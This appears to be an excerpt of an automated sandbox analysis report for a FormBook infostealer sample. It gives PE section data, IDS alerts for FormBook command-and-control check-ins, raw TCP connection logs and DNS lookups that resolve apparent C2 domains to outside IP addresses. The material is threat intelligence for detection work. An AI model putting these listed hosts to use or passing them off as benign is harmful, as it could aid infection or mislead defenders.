                                      .text | 0x2000 | 0xb6524 | 0xb6800 | 4e6f8cfff7266c24bf5ca2133212bfdc | False | 0.9649975920376712 | data | 7.968738777305981 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0xba000 | 0x1ecc | 0x2000 | 75e3c0f140bc69374d943844ea3fdf90 | False | 0.8333740234375 | data | 7.216750164369922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0xbc000 | 0xc | 0x800 | 369b7188ac7efeb708812d81d1e06148 | False | 0.015625 | data | 0.03037337037012526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_ICON | 0xba100 | 0x1959 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9465248882724611
                                      RT_GROUP_ICON | 0xbba6c | 0x14 | data | | | 1.05
                                      RT_VERSION | 0xbba90 | 0x23c | data | | | 0.46678321678321677
                                      RT_MANIFEST | 0xbbcdc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                      DLL | Import
                                      mscoree.dll | _CorExeMain
                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                      06/10/24-10:21:25.134241 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51374 | 80 | 192.168.2.5 | 34.149.87.45
                                      06/10/24-10:21:39.107622 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51378 | 80 | 192.168.2.5 | 116.213.43.190
                                      06/10/24-10:24:15.334767 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51422 | 80 | 192.168.2.5 | 172.67.160.38
                                      06/10/24-10:20:47.394016 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49717 | 80 | 192.168.2.5 | 101.36.121.143
                                      06/10/24-10:23:47.463476 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51414 | 80 | 192.168.2.5 | 64.226.69.42
                                      06/10/24-10:23:33.648907 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51410 | 80 | 192.168.2.5 | 103.120.80.111
                                      06/10/24-10:21:11.241457 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51370 | 80 | 192.168.2.5 | 85.13.162.190
                                      06/10/24-10:21:52.948385 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51382 | 80 | 192.168.2.5 | 102.222.124.13
                                      06/10/24-10:22:07.327341 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51386 | 80 | 192.168.2.5 | 35.241.34.216
                                      06/10/24-10:23:19.260037 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51406 | 80 | 192.168.2.5 | 217.116.0.191
                                      06/10/24-10:22:21.730111 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51390 | 80 | 192.168.2.5 | 176.113.70.180
                                      06/10/24-10:22:36.059394 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51394 | 80 | 192.168.2.5 | 101.36.121.143
                                      06/10/24-10:24:01.195678 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51418 | 80 | 192.168.2.5 | 3.64.163.50
                                      06/10/24-10:22:51.257192 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51398 | 80 | 192.168.2.5 | 103.138.88.32
                                      06/10/24-10:23:05.760710 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 51402 | 80 | 192.168.2.5 | 162.0.213.72
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Jun 10, 2024 10:21:47.881050110 CEST8051380102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:49.008356094 CEST8051380102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:49.059807062 CEST5138080192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:49.278129101 CEST8051380102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:49.278501987 CEST5138080192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:49.389400959 CEST5138080192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:50.407850027 CEST5138180192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:50.413045883 CEST8051381102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:50.413126945 CEST5138180192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:50.415906906 CEST5138180192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:50.629786015 CEST8051381102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:50.631170988 CEST8051381102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:51.753051043 CEST8051381102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:51.797687054 CEST5138180192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:51.919910908 CEST5138180192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:52.937944889 CEST5138280192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:52.946048021 CEST8051382102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:52.946280956 CEST5138280192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:52.948385000 CEST5138280192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:52.954410076 CEST8051382102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:54.076908112 CEST8051382102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:54.123425007 CEST5138280192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:54.331718922 CEST8051382102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:54.331783056 CEST5138280192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:54.348653078 CEST8051382102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:54.348786116 CEST5138280192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:54.350126028 CEST5138280192.168.2.5102.222.124.13
                                      Jun 10, 2024 10:21:54.355031013 CEST8051382102.222.124.13192.168.2.5
                                      Jun 10, 2024 10:21:59.688065052 CEST5138380192.168.2.535.241.34.216
                                      Jun 10, 2024 10:21:59.693000078 CEST805138335.241.34.216192.168.2.5
                                      Jun 10, 2024 10:21:59.694176912 CEST5138380192.168.2.535.241.34.216
                                      Jun 10, 2024 10:21:59.696134090 CEST5138380192.168.2.535.241.34.216
                                      Jun 10, 2024 10:21:59.700980902 CEST805138335.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:00.448599100 CEST805138335.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:00.450155020 CEST805138335.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:00.450216055 CEST5138380192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:01.202239990 CEST5138380192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:02.238068104 CEST5138480192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:02.243062019 CEST805138435.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:02.243149996 CEST5138480192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:02.245327950 CEST5138480192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:02.250196934 CEST805138435.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:03.012447119 CEST805138435.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:03.015007019 CEST805138435.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:03.015090942 CEST5138480192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:03.747327089 CEST5138480192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:04.768794060 CEST5138580192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:04.773848057 CEST805138535.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:04.773925066 CEST5138580192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:04.777486086 CEST5138580192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:04.782335997 CEST805138535.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:04.782466888 CEST805138535.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:05.536735058 CEST805138535.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:05.538300037 CEST805138535.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:05.539367914 CEST5138580192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:06.294220924 CEST5138580192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:07.313647985 CEST5138680192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:07.318675041 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:07.323492050 CEST5138680192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:07.327341080 CEST5138680192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:07.332214117 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:08.098787069 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:08.098803043 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:08.098814011 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:08.098980904 CEST5138680192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:08.102224112 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:08.102235079 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:08.102243900 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:08.102317095 CEST5138680192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:08.102317095 CEST5138680192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:08.104510069 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:08.105930090 CEST5138680192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:08.110116005 CEST5138680192.168.2.535.241.34.216
                                      Jun 10, 2024 10:22:08.114999056 CEST805138635.241.34.216192.168.2.5
                                      Jun 10, 2024 10:22:13.945776939 CEST5138780192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:13.950719118 CEST8051387176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:13.951004982 CEST5138780192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:13.955416918 CEST5138780192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:13.961000919 CEST8051387176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:15.057029963 CEST8051387176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:15.107321024 CEST5138780192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:15.313890934 CEST8051387176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:15.314189911 CEST5138780192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:15.467387915 CEST5138780192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:16.485239983 CEST5138880192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:16.656444073 CEST8051388176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:16.656538010 CEST5138880192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:16.658775091 CEST5138880192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:16.663714886 CEST8051388176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:17.611334085 CEST8051388176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:17.653654099 CEST5138880192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:17.794435978 CEST8051388176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:17.794627905 CEST5138880192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:18.171412945 CEST5138880192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:19.188613892 CEST5138980192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:19.193644047 CEST8051389176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:19.193748951 CEST5138980192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:19.196017981 CEST5138980192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:19.201126099 CEST8051389176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:19.201145887 CEST8051389176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:20.139576912 CEST8051389176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:20.187360048 CEST5138980192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:20.320213079 CEST8051389176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:20.320313931 CEST5138980192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:20.700592041 CEST5138980192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:21.719357967 CEST5139080192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:21.724389076 CEST8051390176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:21.724505901 CEST5139080192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:21.730110884 CEST5139080192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:21.735042095 CEST8051390176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:22.838048935 CEST8051390176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:22.887902021 CEST5139080192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:23.085200071 CEST8051390176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:23.085354090 CEST5139080192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:23.086525917 CEST5139080192.168.2.5176.113.70.180
                                      Jun 10, 2024 10:22:23.091396093 CEST8051390176.113.70.180192.168.2.5
                                      Jun 10, 2024 10:22:28.414582014 CEST5139180192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:28.419579983 CEST8051391101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:28.419656992 CEST5139180192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:28.451299906 CEST5139180192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:28.456265926 CEST8051391101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:29.399543047 CEST8051391101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:29.450400114 CEST5139180192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:29.588102102 CEST8051391101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:29.588202953 CEST5139180192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:29.967439890 CEST5139180192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:30.984998941 CEST5139280192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:30.990236998 CEST8051392101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:30.990314960 CEST5139280192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:30.992815971 CEST5139280192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:30.997777939 CEST8051392101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:31.972712994 CEST8051392101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:32.012968063 CEST5139280192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:32.169287920 CEST8051392101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:32.171518087 CEST5139280192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:32.497456074 CEST5139280192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:33.516019106 CEST5139380192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:33.521186113 CEST8051393101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:33.522490978 CEST5139380192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:33.525440931 CEST5139380192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:33.530421019 CEST8051393101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:33.530565977 CEST8051393101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:34.494849920 CEST8051393101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:34.544179916 CEST5139380192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:34.679996967 CEST8051393101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:34.680061102 CEST5139380192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:35.028601885 CEST5139380192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:36.047383070 CEST5139480192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:36.052397013 CEST8051394101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:36.055506945 CEST5139480192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:36.059393883 CEST5139480192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:36.064394951 CEST8051394101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:37.554281950 CEST8051394101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:37.606684923 CEST5139480192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:37.735769987 CEST8051394101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:37.736064911 CEST5139480192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:37.738089085 CEST5139480192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:22:37.743932009 CEST8051394101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:22:43.658258915 CEST5139580192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:43.663157940 CEST8051395103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:43.663708925 CEST5139580192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:43.665865898 CEST5139580192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:43.670730114 CEST8051395103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:44.669698000 CEST8051395103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:44.669744968 CEST8051395103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:44.669826031 CEST5139580192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:44.889569998 CEST8051395103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:44.889687061 CEST5139580192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:45.169400930 CEST5139580192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:46.188247919 CEST5139680192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:46.193211079 CEST8051396103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:46.193339109 CEST5139680192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:46.195141077 CEST5139680192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:46.200011015 CEST8051396103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:47.210644007 CEST8051396103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:47.210664034 CEST8051396103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:47.210736036 CEST5139680192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:47.424263954 CEST8051396103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:47.424412012 CEST5139680192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:47.700752974 CEST5139680192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:48.719244957 CEST5139780192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:48.724318981 CEST8051397103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:48.724457026 CEST5139780192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:48.726429939 CEST5139780192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:48.731344938 CEST8051397103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:48.731493950 CEST8051397103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:49.729759932 CEST8051397103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:49.729780912 CEST8051397103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:49.730110884 CEST5139780192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:49.938258886 CEST8051397103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:49.938355923 CEST5139780192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:50.232757092 CEST5139780192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:51.250247955 CEST5139880192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:51.255316019 CEST8051398103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:51.255542994 CEST5139880192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:51.257191896 CEST5139880192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:51.262191057 CEST8051398103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:52.257174015 CEST8051398103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:52.257200956 CEST8051398103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:52.257462978 CEST5139880192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:52.464307070 CEST8051398103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:52.464452982 CEST5139880192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:52.465526104 CEST5139880192.168.2.5103.138.88.32
                                      Jun 10, 2024 10:22:52.470398903 CEST8051398103.138.88.32192.168.2.5
                                      Jun 10, 2024 10:22:57.899393082 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:57.904335976 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:57.904494047 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:57.906155109 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:57.911051989 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575686932 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575712919 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575767994 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:58.575855970 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575872898 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575889111 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575905085 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575918913 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575921059 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:58.575933933 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575942039 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:58.575947046 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575961113 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.575994968 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:58.576009989 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:58.580861092 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.580887079 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.580903053 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.580919027 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.580924988 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:58.580959082 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:58.585623026 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.637901068 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:58.690409899 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.690429926 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.690448999 CEST8051399162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:22:58.690502882 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:22:59.419275999 CEST5139980192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:00.438503981 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:00.443717957 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:00.443798065 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:00.446290016 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:00.451167107 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.125991106 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126040936 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126111031 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:01.126220942 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126236916 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126260996 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126276016 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126281977 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:01.126292944 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126308918 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126312971 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:01.126349926 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126349926 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:01.126365900 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.126420021 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:01.131038904 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.131074905 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.131088972 CEST8051400162.0.213.72192.168.2.5
                                      Jun 10, 2024 10:23:01.131109953 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:01.171168089 CEST5140080192.168.2.5162.0.213.72
                                      Jun 10, 2024 10:23:01.244565010 CEST8051400162.0.213.72192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 10, 2024 10:20:47.376724958 CEST | 1.1.1.1 | 192.168.2.5 | 0xe5eb | No error (0) | www.am1-728585.com | | 101.36.121.143 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:21:03.631679058 CEST | 1.1.1.1 | 192.168.2.5 | 0x8192 | No error (0) | www.witoharmuth.com | | 85.13.162.190 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:21:17.514245987 CEST | 1.1.1.1 | 192.168.2.5 | 0x2568 | No error (0) | www.magnoliahairandco.com | cdn1.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Jun 10, 2024 10:21:17.514245987 CEST | 1.1.1.1 | 192.168.2.5 | 0x2568 | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Jun 10, 2024 10:21:17.514245987 CEST | 1.1.1.1 | 192.168.2.5 | 0x2568 | No error (0) | td-ccm-neg-87-45.wixdns.net | | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:21:31.246241093 CEST | 1.1.1.1 | 192.168.2.5 | 0x774c | No error (0) | www.binpvae.lol | | 116.213.43.190 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:21:45.325583935 CEST | 1.1.1.1 | 192.168.2.5 | 0x671a | No error (0) | www.duzane.com | | 102.222.124.13 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:21:59.682296038 CEST | 1.1.1.1 | 192.168.2.5 | 0x580a | No error (0) | www.mg55aa.xyz | | 35.241.34.216 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:22:13.940466881 CEST | 1.1.1.1 | 192.168.2.5 | 0xfde | No error (0) | www.ie8mce.website | | 176.113.70.180 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:22:28.411879063 CEST | 1.1.1.1 | 192.168.2.5 | 0xf4b | No error (0) | www.shrongcen.com | | 101.36.121.143 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:22:43.655594110 CEST | 1.1.1.1 | 192.168.2.5 | 0xe026 | No error (0) | www.skyinftech.com | skyinftech.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 10, 2024 10:22:43.655594110 CEST | 1.1.1.1 | 192.168.2.5 | 0xe026 | No error (0) | skyinftech.com | | 103.138.88.32 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:22:57.894004107 CEST | 1.1.1.1 | 192.168.2.5 | 0x6330 | No error (0) | www.chowzen.top | | 162.0.213.72 | A (IP address) | IN (0x0001) | false
